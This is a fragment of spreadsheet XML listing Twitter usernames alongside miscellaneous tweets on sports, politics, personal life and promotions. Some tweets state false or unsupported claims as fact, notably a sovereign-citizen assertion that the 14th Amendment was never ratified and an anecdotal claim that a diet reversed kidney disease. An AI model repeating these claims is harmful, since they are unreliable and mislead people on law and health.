  <si>
    <t>BBCEssex</t>
  </si>
  <si>
    <t>.@EssexPoliceUK are looking for Robert Davanzo, who is wanted on recall to prison. The 25-year-old has links to Braintree, Chelmsford and Romford. https://t.co/KTeUScSdkx</t>
  </si>
  <si>
    <t>NatalieBrexit</t>
  </si>
  <si>
    <t>@mpbazz1 @1echidna @Shaunf111 @WonkyHaloAngel @Dcaccia1 @Lothark8 @Lexi63496061 @stuartbrexit @brown12008 @ord_steve @ronnieb06227051 @BerrittGary @npsales5 @realSi_jeff @Bri_GBrit @DeanAbstractArt @JervisLynda @R_I_C_K_8_1 @JayC1I @CindersWoody @Bub26949855 Sarah is a big girl and can handle this vile cretin it’s the others I worry about. As he is clearly a sexual predator</t>
  </si>
  <si>
    <t>Rein4ceUnlimit</t>
  </si>
  <si>
    <t>"The Importance of Friends Who 'Get' Your Autism" https://t.co/byxFnqESoi #autism #autsimawareness #awareness #autismspectrum #spectrum #abatherapy #autismparents #woodstockga #abatherapist #abatherapygeorgia #autismmom #autismdad #reinforcementunlimited https://t.co/SHgPizznJk</t>
  </si>
  <si>
    <t>860jenni</t>
  </si>
  <si>
    <t>All this hand-wringing &amp; asking where are brave GOP members?Shouldn't we just assume Trump/Putin are blackmailing them so they back him? I mean does anyone truly believe Russia hacked the DNC but not the RNC emails? #ImpeachTrump #BlueWave</t>
  </si>
  <si>
    <t>magdacsiebert</t>
  </si>
  <si>
    <t>interested in learning more abt cars and car culture</t>
  </si>
  <si>
    <t>Dossaniaa</t>
  </si>
  <si>
    <t>Now I see why my doctor was tryna get me to take my iron pills , I’m anemic it’s cold ash 🥶</t>
  </si>
  <si>
    <t>SweetAsMoscato</t>
  </si>
  <si>
    <t>Every day I am so thankful for the friends that I’ve made here. You truly get me and accept me as I am. Love you more than you know!! 💋</t>
  </si>
  <si>
    <t>chrisomni</t>
  </si>
  <si>
    <t>@ccbloodworth Global Entry is the best $100 I ever spent</t>
  </si>
  <si>
    <t>KeenanLance_</t>
  </si>
  <si>
    <t>Someone just told me I’m the “heart of the office.” I actually almost projectile vomited.</t>
  </si>
  <si>
    <t>SwayGrantham</t>
  </si>
  <si>
    <t>I'm ready to go to #microbitLive but sadly my train is not!</t>
  </si>
  <si>
    <t>I_am_Superskirt</t>
  </si>
  <si>
    <t>Collection purchased awhile back from auctioned off items belonging to @utahjazz retired coach Jerry Sloan~now being listed daily. @NBA @Topps #tootsietoy #antique #ToyCar https://t.co/MPzReKxEHO</t>
  </si>
  <si>
    <t>JTValkyrie</t>
  </si>
  <si>
    <t>@piersmorgan We actually need to have a protest against protest. We could all use a day off out of the office in the sunshine on someone else’s dime😉</t>
  </si>
  <si>
    <t>Leod11Dawn</t>
  </si>
  <si>
    <t>@joncoopertweets @realDonaldTrump I knew from the moment he came down that escalator. Fucking IDIOTTTTT #LockHimUp</t>
  </si>
  <si>
    <t>caitlin_kelly11</t>
  </si>
  <si>
    <t>That scared me for a second there. Phew. #Braves</t>
  </si>
  <si>
    <t>Brandon_Heron</t>
  </si>
  <si>
    <t>The one that got away ...</t>
  </si>
  <si>
    <t>dtripp4801</t>
  </si>
  <si>
    <t>@RichGreene5 Very similar motive. So why did I get reamed? To direct a challenge or my gender?</t>
  </si>
  <si>
    <t>jasmineesimone</t>
  </si>
  <si>
    <t>@KamKasteIIano this is me &amp; if you don’t respond. I’m pulling up. Lmao.</t>
  </si>
  <si>
    <t>TaylorMattingl4</t>
  </si>
  <si>
    <t>@Rick_Gorka @kayleighmcenany @SpeakerPelosi Donald Trump and his Republican Senators have invited Communist China to help them investigate a political rival within our Sovereign Democratic Republic. We now know that Republicans are open to work hand in hand with COMMUNIST CHINA against American voters and rivals. IMPEACH! https://t.co/uI5wA4M1WH</t>
  </si>
  <si>
    <t>M00N_Bl0NDE</t>
  </si>
  <si>
    <t>I felt normal yesterday for the first time in a long time.</t>
  </si>
  <si>
    <t>OfAnAuthor</t>
  </si>
  <si>
    <t>@strudelitis He grins slyly and leads her out of the apartment and slowly walks with her towards the resturant in question. It's probably at least five minutes away from the apartment. "That I shall, ma'am."</t>
  </si>
  <si>
    <t>PattersonChe</t>
  </si>
  <si>
    <t>@KimberleyJ_xxx The Seattle Seahawks away kit is Shockingly bad 😂</t>
  </si>
  <si>
    <t>nqvaah</t>
  </si>
  <si>
    <t>@x2twins @EpicGames This is an amazing skin Jesse and Jordan!! 😝😝</t>
  </si>
  <si>
    <t>CaroleHHicks</t>
  </si>
  <si>
    <t>Sometimes watching the really old TV shows can be so classic. Just caught The Who in the Smothers Brothers Comedy Hour. Keith Moon was such a great drummer. I got to see them in concert in OKC in 1976 with the 4 original members. Great band. #TheWho</t>
  </si>
  <si>
    <t>Jlef1963Jeannie</t>
  </si>
  <si>
    <t>@MrLawsonEdTech I finally figured out force copy! Thanks for sharing on Abre.</t>
  </si>
  <si>
    <t>bropostle</t>
  </si>
  <si>
    <t>haha yeah i love being with God, can’t believe i was with someone like mammon for so long lol, i would never go back tbh...unless?</t>
  </si>
  <si>
    <t>bowhaan</t>
  </si>
  <si>
    <t>Keeping the world at bay could leave you high and dry. People ... More for Scorpio https://t.co/580CwMJpsT</t>
  </si>
  <si>
    <t>canadianliber</t>
  </si>
  <si>
    <t>@AJA_Cortes It’s a habit like any to break. Im Canadian and find myself saying sorry too much. I’m reconditioning to say “thank you” instead. Sorry for being late ✖️ Thank you for your patience ✔️</t>
  </si>
  <si>
    <t>Claylude</t>
  </si>
  <si>
    <t>@strosfaniknow @Lissielys @mrmisterbobbyb @RyanLostinTX I was just about to ask her “why you jeal?” But that’s fine</t>
  </si>
  <si>
    <t>crocsushi</t>
  </si>
  <si>
    <t>@SorcererLance Payout is on the first of every month, takes all day for it to process payment from patrons</t>
  </si>
  <si>
    <t>bmorsh</t>
  </si>
  <si>
    <t>Probably needs to be 7x more powerful to match actual performance 🤣😂 https://t.co/PJPn9ngIGM</t>
  </si>
  <si>
    <t>Kropotkin_alias</t>
  </si>
  <si>
    <t>@LiquidFaerie you can’t take a Tory anywhere - not even to their own conference .... 😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂</t>
  </si>
  <si>
    <t>deathbatirwin</t>
  </si>
  <si>
    <t>@LordFlopp2 @unrealizzztic SO MANY MEN WITH A J NAME HAVE RIPPED MY HEART OUT AND STOMPED ON IT</t>
  </si>
  <si>
    <t>theancientgeeko</t>
  </si>
  <si>
    <t>@HalstedMedieval I bet! Usually, the only reason we lose food in the house is that one of the cats has dragged it somewhere...</t>
  </si>
  <si>
    <t>IndianaJones79</t>
  </si>
  <si>
    <t>@MollyJongFast Well that came out of the blue. Does Trump have a history of lying?</t>
  </si>
  <si>
    <t>cw1985</t>
  </si>
  <si>
    <t>"These short stories are sexy and fun... I loved the wide variety of types, fetishes, positions and relationships expressed in these stories." Amazon review of Multi-Orgasmic Vol 2: https://t.co/X0tmGlPF1K #SupportIA #PDF1 #BYNR #greatreads #mustread https://t.co/MgbRZDHWFV</t>
  </si>
  <si>
    <t>Frojo34</t>
  </si>
  <si>
    <t>So a little over 5k votes with an hour 30 mins left and HulkBuster looks to win the vote. Daredevil (Netflix) in 2nd place. Hopefully they have time to buff him also!!! #BuffDareDevilTOO PLZ!!! @MarvelChampions @KabamThel @KabamMiike (your girl Kamala not looking so good) https://t.co/xpFv0Jt78s</t>
  </si>
  <si>
    <t>fruitsheII</t>
  </si>
  <si>
    <t>I stopped watching breaking bad for a while but I need to finish before camino comes out but I don’t understand but I don’t have time but it’s so intense https://t.co/pVXExT66Uz</t>
  </si>
  <si>
    <t>Msb00mbastick</t>
  </si>
  <si>
    <t>@Swoozie123 For fuck sake you people need to learn the truth and stop making yourself like jackassess on Twitter..</t>
  </si>
  <si>
    <t>shristi_tsecho</t>
  </si>
  <si>
    <t>@louievuiitton Dw I’ll look for a full time position there just to remind you</t>
  </si>
  <si>
    <t>TheDrakeHarper</t>
  </si>
  <si>
    <t>Book Tower restoration to feature hotel, retail, office space. Bedrock plans to bring the iconic Book Tower back to life with a mix of residential, hotel, retail and office space. https://t.co/sm9O7ta0QW https://t.co/x89mPxcxQx</t>
  </si>
  <si>
    <t>NickB_1982</t>
  </si>
  <si>
    <t>Gig was up once we lost both DEs. Couldn’t rush the passer consistently after that. Stellar performance by Trask and the receivers but lack of a run game meant LSU could start to tee off with the blitzes. Good effort #Gators let’s get right and move on.</t>
  </si>
  <si>
    <t>guygombaa</t>
  </si>
  <si>
    <t>@BadTakesJake Includes quite a few games I haven’t gotten to play but would love to, and a few that would probably be in my list too. Honestly I really like this? I don’t see Twilight Princess though.</t>
  </si>
  <si>
    <t>MyWeather_NCL</t>
  </si>
  <si>
    <t>🌃️ #Newcastle Mostly cloudy for the hour 11°C with partly cloudy night, Possible light rain tomorrow morning with highs of 12°C #MyWeather</t>
  </si>
  <si>
    <t>False_plausible</t>
  </si>
  <si>
    <t>@pam30301 @gavinesler in your profile you say "clean Break WTO only way"....can I ask you what you feel will be the economic ramifications of this action? I ask just to understand if you say this as a "sheep" or if like me you studied economics and have an insight that the other 99% have missed?</t>
  </si>
  <si>
    <t>TrueRepublics</t>
  </si>
  <si>
    <t>@Harleytrouble @DoingRight1 @Red3691 @Tombstone1954 @EinsteinsMagic @MAGAGirl8 @galacticaactual @BundyGP @RL9631 @TUC2014 @Tpeee60 @KiltyJeremy @AskmoreNorman @cbrady923 @sapiofox @CaliNeedsHelp @EdgewoodTom @gdzyi @GreyBeard_Biker @riki7s @DustinTahoe76 @TimRunsHisMouth @dragons7676 @Thomas1774Paine @SonOfLi61276141 @Bestemt951 @23_jhawk @ChrisWh11261958 @occupycorruptDC @SacredFireSOL @papa9069 4) Since the 14th Amendment was never ratified therefore U.S. citizens are illegal aliens of the several states and commercially domicile in the 10 sq mile called the United States IRS code Title 26 USC 7701(39)(a)(b). That is why U.S. citizens cannot be property owners... https://t.co/tEjQKzczVt</t>
  </si>
  <si>
    <t>CurriculumNwlsd</t>
  </si>
  <si>
    <t>Mrs. Heinlein is using the Grid Method to personalize learning for her 8th grade students in science. She is using Gizzmos, Quizziz, Edulastic, Quizlet and more to engage her students and help them monitor their learning about Forces and Energy. #NWLSDGoBeyond https://t.co/r9RqYwmKDN</t>
  </si>
  <si>
    <t>tklforgiven</t>
  </si>
  <si>
    <t>@LindaRa40636624 @EastCoast103 @garym9999 @GlennB10809975 @JohnArt04657735 @zapher134 @GreekVikingX @Dylon59556561 @zypisfy @yourmomspants1 @rmbctious @davidjdennison1 @LindaEver4 @lindaz333 @tristyjones @AprilLigeia @Cern_lXXl @Atheist_Dragon @misty4630 @tcunderdahl @mikenedie @afperezb9 @MakiN47550299 @NoHolyScripture @MeMysel41161908 @PerfectHolyGod @1CubbieKat1 @MBPaulkovich @Rael0714 @CindyJC007 @Wolfpak561 @Jesus_is_G_d @GregRickard1 @horusrage @debbiepalm44 @yourmumspants @Perdnoot @Oswald1160 @CATGOD24 @VFracos @Chrisinatent @alan244g @StopLordDampnut @username4what @AngelaN84449772 @Kevin64348250 @ax2n38 @Duke1CA @__Helicon__ @LeyFenix Wrong. If you don’t believe in God , you are out of touch with reality. You think you know what reality is vs what Christians believe but you are lying to yourself and to us.</t>
  </si>
  <si>
    <t>Welcome_2_Moes</t>
  </si>
  <si>
    <t>@MrSteveBob @lincolnistrash @3YearLetterman @realDonaldTrump So the entire continent just wasnt there until 1993? Try again.</t>
  </si>
  <si>
    <t>marie_varela33</t>
  </si>
  <si>
    <t>The older I get the more attractive stability becomes. If you don’t bring me some peace of mind get the fuck out of my life.</t>
  </si>
  <si>
    <t>CatlinBogard</t>
  </si>
  <si>
    <t>@morrisoncrying The sad thing is I actually had to think about this for a minute and go “Does Minnesota not have a DI team?"</t>
  </si>
  <si>
    <t>AllMoneyInRico</t>
  </si>
  <si>
    <t>My sister want an ipad for her bday guess who getting an empty ipad box?</t>
  </si>
  <si>
    <t>GayaditeQuotes</t>
  </si>
  <si>
    <t>gigavolt the gays</t>
  </si>
  <si>
    <t>AngelicaLarita1</t>
  </si>
  <si>
    <t>@LeftyVegas I feel u,me too never felt this much hate for a politician in my lifetime.</t>
  </si>
  <si>
    <t>1TSH1</t>
  </si>
  <si>
    <t>@UrgentNews911 @muddypaw_co Looks perfectly fine to me. Pass the parmesan please.</t>
  </si>
  <si>
    <t>justmilaj</t>
  </si>
  <si>
    <t>Deeply saddened to hear the news about Congressman #ElijahCummings May you rest in Heaven. 🙏🏽</t>
  </si>
  <si>
    <t>RchsCardinals</t>
  </si>
  <si>
    <t>Check. This. Out. 🙌😎 The Duke of Edinburgh Adventurous Journeys for Participants of the Bronze and Silver Awards, including three students from RCHS: Georgia, Colby and Natalie. Thanks Mr. Russell and Mr. Keefe!!! For more info about The Duke Program please see Mr. Russell. https://t.co/vaX631Q558</t>
  </si>
  <si>
    <t>Dhaneye</t>
  </si>
  <si>
    <t>@Scarletjersey Imo I think big ten East is between us and psu . Going to be an epic one in Columbus .</t>
  </si>
  <si>
    <t>sydnora_</t>
  </si>
  <si>
    <t>Man I miss the scream tour era 😂😂</t>
  </si>
  <si>
    <t>Russian agents opened champagne when Trump won in 2016 and uttered almost in unison: ‘We made America great,'" according to communication in a new Senate Intelligence Committee report on election interference https://t.co/AigjfKaLOz https://t.co/UNv7V6AssW</t>
  </si>
  <si>
    <t>MarshaChene</t>
  </si>
  <si>
    <t>@tribelaw Do u believe that if Trump is impeached, tried &amp; convicted, and a Dem is elected, should that new president be allowed to PARDON him? I believe that should be a ? for every current candidate, D or R. Would love your opinion.</t>
  </si>
  <si>
    <t>KAY_ScreamIT</t>
  </si>
  <si>
    <t>Ironically, owning up to your vulnerabilities seems to be the ... More for Leo https://t.co/i3nOuFoLGE</t>
  </si>
  <si>
    <t>TheWolfestew</t>
  </si>
  <si>
    <t>I'm attempting #inktober this year. I highly doubt that I'm going to finish, but these are nice to work on before bed. ^^ #art #inktober2019 https://t.co/19lPs8UUF1</t>
  </si>
  <si>
    <t>CMLTPACKERS</t>
  </si>
  <si>
    <t>@NYJETSCML @CrossfireLG Yes he is truly a damn good young man , honestly when I joined the league I thought he was 30-40 years old. His dedication, fareness, strict but not a dictatorship way rubbed off on all users .I know he will succeed he’s just going through a rough time in his life .</t>
  </si>
  <si>
    <t>slyxmike</t>
  </si>
  <si>
    <t>is atl the best move for rappers or artist in that industry?</t>
  </si>
  <si>
    <t>CursedFurryBoi</t>
  </si>
  <si>
    <t>Dear Claudette who sandbagged me. GET KARMAD BITCH! She sandbagged me after I ran the killer for the entire game. I got downed, she got downed. The killer hung her and the took me to the exit and let me go! GET FUCKED!!!</t>
  </si>
  <si>
    <t>BET</t>
  </si>
  <si>
    <t>@madierr1 Thank you for the ❤️! Expect to get a reminder tweet on October 23 so you don't miss the premiere! In the meantime, here's something to get you hype for #TheOvalOnBET and #SistasOnBET! https://t.co/9TnHiJCINg</t>
  </si>
  <si>
    <t>RossPittman8</t>
  </si>
  <si>
    <t>@ChristopherVui2 @peterdaou We do. Just go through the legal process. It’s also not sustainable to allow every person to become a citizen.</t>
  </si>
  <si>
    <t>BradJ_M</t>
  </si>
  <si>
    <t>“Then you're not only reinforcing a false sense of self but are also helping to accelerate your body's aging process by creating an accumulation of past in your psyche. Verify this for yourself by observing those around you who have a strong tendency to hold on to the past.” 2/2</t>
  </si>
  <si>
    <t>TiaraMczeal</t>
  </si>
  <si>
    <t>@SelfMade_Zavi @young24thegod But always worried about the next bitch 😂</t>
  </si>
  <si>
    <t>chelsgennard_</t>
  </si>
  <si>
    <t>You may feel oddly estranged from everything that should be fa... More for Aquarius https://t.co/KmBj7BRVC0</t>
  </si>
  <si>
    <t>Sabre3611</t>
  </si>
  <si>
    <t>@alx @RayRay12029378 @RudyGiuliani BAM! The water is fully chummed and all hooks set.</t>
  </si>
  <si>
    <t>JoLa4SoPo</t>
  </si>
  <si>
    <t>@pdxalerts Isn't that the location of Dishman Community Center? Coincidence?</t>
  </si>
  <si>
    <t>misslauren540</t>
  </si>
  <si>
    <t>I just want everyone to know .. Mr. Brown sings “This is your granddaddy” at least 3 times a day in my head.</t>
  </si>
  <si>
    <t>thaumatropia</t>
  </si>
  <si>
    <t>@herong @PRAEyesRight Ahh yes, that quintessentially American tradition of shutting up and doing as your told</t>
  </si>
  <si>
    <t>Toramelle</t>
  </si>
  <si>
    <t>is it bad I played through Stormblood content and the think I was most excited for was the MH content.</t>
  </si>
  <si>
    <t>meepstone0</t>
  </si>
  <si>
    <t>@JoanneRN123 @Jim_Jordan and yet, you still didn't tell me which section is the quid pro quo. I knew you weren't going to. I'd be shocked if you even read it before I posted a link to it. Every response you give not highlighting the quid pro quo, makes you look more foolish.</t>
  </si>
  <si>
    <t>AGNewsTeam</t>
  </si>
  <si>
    <t>Here are four ways the Holy Spirit functions in the life of a believer. https://t.co/JBxm9SX9z7</t>
  </si>
  <si>
    <t>Kris_Witta_K</t>
  </si>
  <si>
    <t>I'm hearing 90210 in Houston next month &amp; that's one goal already for November! 😤</t>
  </si>
  <si>
    <t>BronchosAD</t>
  </si>
  <si>
    <t>New Story: Boys Varsity Soccer loses hard fought battle to St. Clair 1 - 0 https://t.co/fCNDpNutBK</t>
  </si>
  <si>
    <t>Kimberlyjoneswa</t>
  </si>
  <si>
    <t>I believe in elimination diets. It put my Stage 3 Kidney disease, pushing to Stage 4 back up to Stage 2 almost Stage 1. Wahoo! https://t.co/Q0ITLYDSXx</t>
  </si>
  <si>
    <t>tccasillas</t>
  </si>
  <si>
    <t>$100 million worth of talent not on the field ? This is Aaron Rodgers and the Packers!!</t>
  </si>
  <si>
    <t>icy464</t>
  </si>
  <si>
    <t>@llmunro This argument is supported by how strongly adoptees like myself are taught to see our adoption as something to be grateful for. This framing buries the pain and hurt that we carry.</t>
  </si>
  <si>
    <t>5t3v3nPh4m</t>
  </si>
  <si>
    <t>my s2000 was supposed to be widebody for spocom but the car’s wiring is playing with me</t>
  </si>
  <si>
    <t>DanielDyas</t>
  </si>
  <si>
    <t>@MrAndyNgo Rediculous. We need to get back to when men were men and women were women. They fell in love with someone of the opposite sex and got married and stayed married.</t>
  </si>
  <si>
    <t>quadency</t>
  </si>
  <si>
    <t>The crypto market is green. Cryptocurrency trading volume increased by 25%! #Bitcoin $BTC #Ethereum https://t.co/ebbD6RA0Xu</t>
  </si>
  <si>
    <t>Ryan43526910</t>
  </si>
  <si>
    <t>@R0ZLS @YvanShicolito @Chachou2Chachou @yonko_luffytaro Yeah but One Piece is better than FT and most of the anime u listed tho 🚪🚶‍♂️</t>
  </si>
  <si>
    <t>Wave80radio</t>
  </si>
  <si>
    <t>Now Playing: The Breakup Song - Greg Kihn Band - Listen now at https://t.co/CvzilQ85Yu #80s #80smusic https://t.co/8eWSHC9KHk</t>
  </si>
  <si>
    <t>KearnyKomets</t>
  </si>
  <si>
    <t>Falcon field goal is no good... 7-0 Komets... 5 minutes left in the first</t>
  </si>
  <si>
    <t>AbersoldW</t>
  </si>
  <si>
    <t>When my father passed away two years ago I purposely did not do any qigong healing . Today was my first combination healing class and happy to say all is back 100% . Session available for serious locals. Only pre req cannot be a recreation drug user.. https://t.co/nq2DWNdKL2</t>
  </si>
  <si>
    <t>FrenchOnSkype</t>
  </si>
  <si>
    <t>Bonjourrr, les adorables !⠀ ⠀ Do you want to have a flawless pronunciation so that you are mistaken for a native and be easily understood by French speakers all over the world? Every Friday, I tell you what was the… https://t.co/5dsK8zcbJR</t>
  </si>
  <si>
    <t>Raynaissance</t>
  </si>
  <si>
    <t>@Eddie2048 @demsin20 @TheRickWilson Even on his death bed, he'll be telling the world he's in the best shape ever! 😂</t>
  </si>
  <si>
    <t>YCataldo</t>
  </si>
  <si>
    <t>Hey @Alukowiry, Thank you for the follow!</t>
  </si>
  <si>
    <t>Rogersk214</t>
  </si>
  <si>
    <t>@ChrisHurstVA So happy for you, Chris!</t>
  </si>
  <si>
    <t>TheFlavourFox</t>
  </si>
  <si>
    <t>Nutella home-made gelato is in today 🍦 Store hours: 12pm to 9pm ... #nutellagelato #icecream #sorbetto #oakvilleicecream #bronte #bronteicecream #vegangelato #nutella @ The Flavour Fox Inc https://t.co/XNTbiGspGL</t>
  </si>
  <si>
    <t>i_am_quigs</t>
  </si>
  <si>
    <t>You would think after the targeting rule being around for a while now that they would get these calls right in the game but I feel like every single one that is called/not called is still wrong.</t>
  </si>
  <si>
    <t>LifelongAdpt</t>
  </si>
  <si>
    <t>New blog posted: Coping with the Post-Adoption Blues. Read more at: https://t.co/kfuAzTwXUr https://t.co/CJpsV8xiex</t>
  </si>
  <si>
    <t>thats b4 that shit was legal... never for driving either</t>
  </si>
  <si>
    <t>carlanthoni</t>
  </si>
  <si>
    <t>The mere hint of a path toward better organization is enough t... More for Cancer https://t.co/i9nhvvpqrc</t>
  </si>
  <si>
    <t>HectorBrito16</t>
  </si>
  <si>
    <t>@RachelBock9 The education and well paid becomes an excuse to be bitchy and bossy and that makes them dim and dumb. Properly educated individuals are open minded and thus humble servants, regardless of gender.</t>
  </si>
  <si>
    <t>southxrnsun</t>
  </si>
  <si>
    <t>@Melinatedbeauty people need to use common sense 🙃 https://t.co/ysqwkY85lh</t>
  </si>
  <si>
    <t>Jacquel13149633</t>
  </si>
  <si>
    <t>@Eldermld1 I am talk about Jesus who is God in Spirit and flesh I talking same one you referring to same God</t>
  </si>
  <si>
    <t>DFWTrivia</t>
  </si>
  <si>
    <t>Thursday, 10/3 Live Trivia 7:00 - Cork &amp; Growler - Frisco 7:00 - Kegs &amp; Mugs - Lewisville 7:00 - The Spirit Grille - Las Colinas 7:00 - What's On Tap Keller 7:30 - Redrock Bar and Grill - North Dallas No trivia at Fuzzy's tonight in Waco, see you next week #LiveTrivia hints https://t.co/mrCFd6Q2n3</t>
  </si>
  <si>
    <t>spaceCold_</t>
  </si>
  <si>
    <t>oooh i finally found the music that plays during the zinogre trailer god yesssssss https://t.co/k5mTiI6EI8</t>
  </si>
  <si>
    <t>cabanam</t>
  </si>
  <si>
    <t>Limited free copies of the @AmerAcadPeds Pediatric Environmental #Health, 4th edition will be available for attendees. @MontefiorePeds @AAPNews @AAPJournals https://t.co/AQuVZfy8w7</t>
  </si>
  <si>
    <t>jessica_f6</t>
  </si>
  <si>
    <t>I like this person your becoming, but it’s hard to get used to... but I love us both</t>
  </si>
  <si>
    <t>callow_explorer</t>
  </si>
  <si>
    <t>Hey @CalgaryArtsDev, @yycwhatson - there's a new Art Lounge opening tonight - any chance you could help spread the word? Thanks! https://t.co/LwVTBn3RzU</t>
  </si>
  <si>
    <t>bemarrio</t>
  </si>
  <si>
    <t>@elle_marriott Someone said to me at work that apparently calories don’t count whilst you’re working</t>
  </si>
  <si>
    <t>Julian5_5</t>
  </si>
  <si>
    <t>JaxDad610</t>
  </si>
  <si>
    <t>Found this throwback pic of me and the man @marvinfreeman84 - thinking 1993. I need to get this signed &amp; framed! @braves https://t.co/mzwt0e9dBQ</t>
  </si>
  <si>
    <t>KcRouth</t>
  </si>
  <si>
    <t>4 of 5 stars to Black Elk Speaks by Black Elk https://t.co/X4AaqJeMXS</t>
  </si>
  <si>
    <t>reporterjulie</t>
  </si>
  <si>
    <t>My alma mater @UPLamar got a new website! And as usual, I'm really bummed I missed @LamarUniversity's #Homecoming https://t.co/0fu3swcg5i</t>
  </si>
  <si>
    <t>ChrisInIndy3</t>
  </si>
  <si>
    <t>@SeanWTHR cLiMaTe ChAnGe iS a HoAx MaDe Up bY tHe cHiNeSe https://t.co/5Npr0263Pm</t>
  </si>
  <si>
    <t>qwikad_buy_sell</t>
  </si>
  <si>
    <t>Don't Miss This Retirement Planning Webinar - Free eBook For Attending! Visit: https://t.co/4z8yd2hL5c #LocalAds #Don't #Miss #This #Retirement #Planning #Webinar</t>
  </si>
  <si>
    <t>marcusbowlerhat</t>
  </si>
  <si>
    <t>@Peachey_Austin @randfish @CyrusShepard @BritneyMuller How long is a piece of string? Depends very much on the type of clients and the work delivered.</t>
  </si>
  <si>
    <t>JJOdelle</t>
  </si>
  <si>
    <t>Looking back at it... I have probably been rapid cycling (having at least 4 depressive episodes) every year for the last 13 years! Last 2 years were the most severe. I almost lost my job. This is why I’m so tired. #bipolardisorder #Mentalhealth</t>
  </si>
  <si>
    <t>sheldoneakins</t>
  </si>
  <si>
    <t>Episode 109: Community and Education Reform in New Orleans Post Katrina with Dr. Daniella Cook #leadingequity https://t.co/mah7Q8YGjR https://t.co/kK3gcNFYem</t>
  </si>
  <si>
    <t>nelisaalondra</t>
  </si>
  <si>
    <t>@Boiledsquirrel now u have achieved the final form of the Ultimate Tumblr Girl Grunge Model</t>
  </si>
  <si>
    <t>Lynndajacobs</t>
  </si>
  <si>
    <t>I always get sad and go through my pictures from when I was hot but then I just get sadder ☹️</t>
  </si>
  <si>
    <t>WatchWhere</t>
  </si>
  <si>
    <t>Mysterious Skin (2004) is available to watch online for FREE! #MysteriousSkin Watch now: https://t.co/U3eIAP1P1Z https://t.co/vD84l65XzD</t>
  </si>
  <si>
    <t>MargiePorter1</t>
  </si>
  <si>
    <t>Featured Art of the Day: "Oval Roses". Buy it at: https://t.co/WpXeSQkduB https://t.co/BfAERyoWS4</t>
  </si>
  <si>
    <t>deanoandrews9</t>
  </si>
  <si>
    <t>So Juan foyth starts at right back for Argentina, but Pochettino would prefer to play Sissoko there in front of him against Brighton. Confusing.</t>
  </si>
  <si>
    <t>plainwildcatfan</t>
  </si>
  <si>
    <t>Chop block penalty against Laurier gives Windsor a first down. They're into the red zone.</t>
  </si>
  <si>
    <t>mellie62</t>
  </si>
  <si>
    <t>Featured Art of the Day: "Wine and Cheese". Buy it at: https://t.co/L0YvcCgTrc https://t.co/tiIXtyKzR7</t>
  </si>
  <si>
    <t>macfarlane_miss</t>
  </si>
  <si>
    <t>S2 RE - Snakes and ladders games today!!! https://t.co/aPjYuKbAeT</t>
  </si>
  <si>
    <t>witchofthewood1</t>
  </si>
  <si>
    <t>Five bags of popcorn for #MisterAmerica! 🍿🍿🍿🍿🍿 @timheidecker @greggturkington https://t.co/c9AaeXDREm</t>
  </si>
  <si>
    <t>Melindajosaphin</t>
  </si>
  <si>
    <t>@Blacknesssss @Variety The outright demonic symbolism escapes everyone.</t>
  </si>
  <si>
    <t>isack2621</t>
  </si>
  <si>
    <t>DICKER THE KICKER</t>
  </si>
  <si>
    <t>GreenScreenAni2</t>
  </si>
  <si>
    <t>Good Boys Blu-ray/DVD #Adventure #Comedy 3 6th grade boys ditch school and embark on an epic journey while carrying accidentally stolen drugs, being hunted by teenage girls, and trying to make their way home in time for a long-awaited party. https://t.co/3vaeAMjAwX</t>
  </si>
  <si>
    <t>UK_LogoDesign</t>
  </si>
  <si>
    <t>Logo Design ONLY £49! Unlimited Revisions! 100's Worldwide Clients! Excellent Feedback! 90+ 5* reviews! Quick Turnaround! More services available including web design, print, graphic design and more! All logos &amp; designs are vector! https://t.co/kRVRs0O85A #UKLateHour https://t.co/fPzvJyEPEJ</t>
  </si>
  <si>
    <t>scott_christman</t>
  </si>
  <si>
    <t>Nice taste. Good flavors. A nice hopfenweisse with pineapple and coconut. - Drinking a Pina Weisse by 8e Péché @ Scott's Suds Sanctuary — https://t.co/D3WMZdgOn8</t>
  </si>
  <si>
    <t>MantyShips</t>
  </si>
  <si>
    <t>Congratulations to Ships 🎾 singles players: KPeterson, CRamminger, and DBrockman for advancing to WIAA Sectional play Thursday! https://t.co/S20wEqRhSe</t>
  </si>
  <si>
    <t>IAmKingBey</t>
  </si>
  <si>
    <t>@xoIAmG That’s literally one of my problems with the show lol he needs his damn father</t>
  </si>
  <si>
    <t>NikitaPatlolla</t>
  </si>
  <si>
    <t>I think at this point trumps lawyer’s lawyer’s lawyer’s lawyer’s lawyer’s lawyer’s lawyer needs to get a lawyer. yikes</t>
  </si>
  <si>
    <t>CSIPresJill</t>
  </si>
  <si>
    <t>After finishing #75Hard, I am still working out (most days twice), eating pretty clean &amp; drinking lots of water. New lifestyle. Mindset changed. Great things ahead. If you need a reboot, check out @andyfrisella and #75Hard. You can do it! You deserve to win!</t>
  </si>
  <si>
    <t>PeteKrupsky</t>
  </si>
  <si>
    <t>#TipTuesday - @USAHockeyNTDP U18s (3-0-0) open the home schedule at @USAHockeyArena on Saturday at 7pm against @NMUHockey and @NDHockey on Sunday at 4pm. Tix: https://t.co/SDm3yVc2R8. Video: The #NTDP beat @MaineIceHockey on 12/8/18: https://t.co/Zs1GEKiOXD https://t.co/e0EOetjbPe</t>
  </si>
  <si>
    <t>jermnotgerm</t>
  </si>
  <si>
    <t>I’m in hella pain right now i need a foam roller and a tiger joint fa reaaaal</t>
  </si>
  <si>
    <t>averypickford</t>
  </si>
  <si>
    <t>They were statistically tied before this poll, and they are still statistically tied. #statschat https://t.co/fYJ5Ia6WX3</t>
  </si>
  <si>
    <t>MrJackAllen</t>
  </si>
  <si>
    <t>Am I the only one getting tired of Walgreens locking up everything and only having two workers on shift - like who is out here stealing gold bond and febreeze??? https://t.co/Yz7Kf18v5q</t>
  </si>
  <si>
    <t>JimSpivey3</t>
  </si>
  <si>
    <t>@luvisss_ I experience this to be true.</t>
  </si>
  <si>
    <t>Evolust</t>
  </si>
  <si>
    <t>Curry Pork anyone? Made it for the first time. Wish me luck. @GeekWithThat @pkmmpositivity It was fun watching you guys play. https://t.co/9NbaO4jlDp</t>
  </si>
  <si>
    <t>EricinSC76</t>
  </si>
  <si>
    <t>@Breaking911 Maybe they should work in the Ukraine</t>
  </si>
  <si>
    <t>davidwalshblog</t>
  </si>
  <si>
    <t>I did my best to draw out details about perf and JS tricks, but those questions were very broadly answered or not answered at all. Understandably from their point of view, but I'm still dying to know those micro-optimizations that keep the site fast.</t>
  </si>
